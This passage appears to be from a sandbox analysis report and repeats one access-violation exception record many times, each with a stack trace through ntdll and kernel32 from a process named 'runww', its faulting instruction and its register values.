registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
